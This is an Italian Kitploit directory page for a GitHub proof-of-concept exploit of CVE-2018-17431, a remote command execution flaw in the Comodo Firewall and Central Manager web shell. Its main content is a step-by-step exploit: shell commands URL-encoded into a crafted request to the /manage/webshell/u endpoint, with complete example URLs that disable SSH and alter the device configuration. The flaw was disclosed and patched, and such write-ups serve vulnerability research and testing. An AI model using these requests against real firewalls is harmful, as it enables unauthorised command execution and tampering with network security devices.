Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2018-17431-PoC — Prova di concetto per CVE-2018-17431 | Kitploit
Strumenti/GitHubGitHub/fadavvi/cve-2018-17431-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso RemotoArchived
GitHubfadavvi/cve-2018-17431-poc

CVE-2018-17431-PoC

Prova di concetto per CVE-2018-17431

Vedi Repository
2315 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2018-17431-PoC

Prova di concetto per CVE-2018-17431

Titolo Exploit: Comodo Firewall & Central Manager (UTM) - Esecuzione remota di comandi in tutte le release precedenti alla 2.7.0 e 1.5.0 (basata su Web Shell)

Autore Exploit: Milad Fadavvi

Homepage del vendor: https://www.comodo.com/

Link del software: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276

Scarica lo strumento

Versione: precedente alla 2.7.0 e 1.5.0

Testato su: Windows:firefox/chrome - Kali:firefox

Data di scoperta: 2018-08-15 (segnalato lo stesso giorno)

Conferma che il bug esiste: 2018-09-22 (Ticket ID: XWR-503-79437)

Patch rilasciata: 2018-11-23 Note di rilascio da Comodo

Exploit:

  1. Simulazione WebShell:

    root@kitploit:~
     Ad esempio, per disabilitare SSH nella web shell:
         - service [hit enter]
         - ssh [hit enter]
         - disable [hit enter]
    
  2. Codifica

    root@kitploit:~
     codifica la sequenza precedente con URL ECODING
     (Ho usato il plugin burp encoder)
    
     %73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a
    
  3. Esegui

    root@kitploit:~
     URL di base: https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Encoded_Command]&l=[Integer]&_=1534440840152
     
     
               https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152 (invio extra per eseguire il comando)
               
    
     Esempio: https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152
     
           https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152
    

Verrà mostrata una pagina con il messaggio "Configuration has been altered" e la configurazione verrà modificata!

Con questa tecnica possiamo simulare tutti i comandi WebShell.